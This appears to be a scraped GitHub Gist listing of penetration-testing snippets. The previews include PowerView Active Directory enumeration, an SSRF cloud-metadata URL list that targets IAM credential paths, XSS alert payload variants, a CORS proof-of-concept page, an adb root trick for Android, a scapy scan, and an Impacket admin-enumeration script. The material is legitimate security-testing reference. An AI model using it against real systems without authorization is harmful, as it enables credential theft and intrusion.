A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
Matthew Linney Taius
jivoi
/ PowerView-2.0-tricks.ps1
Created
March 10, 2018 16:23
— forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
jhaddix
/ cloud_metadata.txt
Last active
June 19, 2025 21:10
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump | |
| # install the necessary software: | |
| #$ sudo apt install flashrom binwalk || echo 'git clone?' | |
| # pump up binwalk with additional packages and libraries | |
| #$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh) | |
| # place the clip on the chip, connect it to the adaptor, which sould be connected to your PC (with drivers installed) and launch the script: | |
| # chip => clip => adaptor => PC => script |
jhaddix
/ Testing_Checklist.md
Last active
June 17, 2025 05:54
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
ropnop
/ cors_poc_test.html
Last active
November 14, 2018 07:01
Quick tester for CORS misconfigurations
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script src="https://code.jquery.com/jquery-3.2.1.min.js"></script> | |
| <h1>CORS Test PoC</h1> | |
| <label for="target_url">Endpoint to test: </label><input type="url" id="target_url" size=100 placeholder="Target URL"><br/> | |
| <input type="checkbox" id="with_creds_checkbox" value="with_creds"><label for="with_creds_checkbox">With Credentials?</label><br/> | |
| <input type="submit" id="submit_btn" value="Make Request"> | |
| <hr> | |
| <p>If the site is vulnerable to an overly permissive CORS policy, the response of the above request will appear in the box below</p> | |
| <div id="test_data" style="border:1px solid darkred; color: red"> |
Gain adb root.
$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
Download Magisk-v14.0 and extract it somewhere. Download MagiskManager.
DiabloHorn
/ ipless-scan.py
Created
October 26, 2017 21:41
Perform a port scan without having an IP configured on your network interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # DiabloHorn - https://diablohorn.com | |
| # scan target IP from an interface with no IP configured | |
| # POC - scapy | |
| # pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S') | |
| # sendp(pkt,iface='eth0') | |
| import sys | |
| from scapy.all import * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [ "$#" -ne 3 ]; then | |
| echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>" | |
| exit 1 | |
| fi | |
| nmap -nvv -Pn -sSV -T1 -p$(cat $1 | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA $3 $2 |
ropnop
/ lookupadmins.py
Last active
February 10, 2025 16:53
Python script using Impacket to enumerate local administrators over SAMR
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Title: lookupadmins.py | |
| # Author: @ropnop | |
| # Description: Python script using Impacket to query members of the builtin Administrators group through SAMR | |
| # Similar in function to Get-NetLocalGroup from Powerview | |
| # Won't work against Windows 10 Anniversary Edition unless you already have local admin | |
| # See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016 | |
| # | |
| # Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket |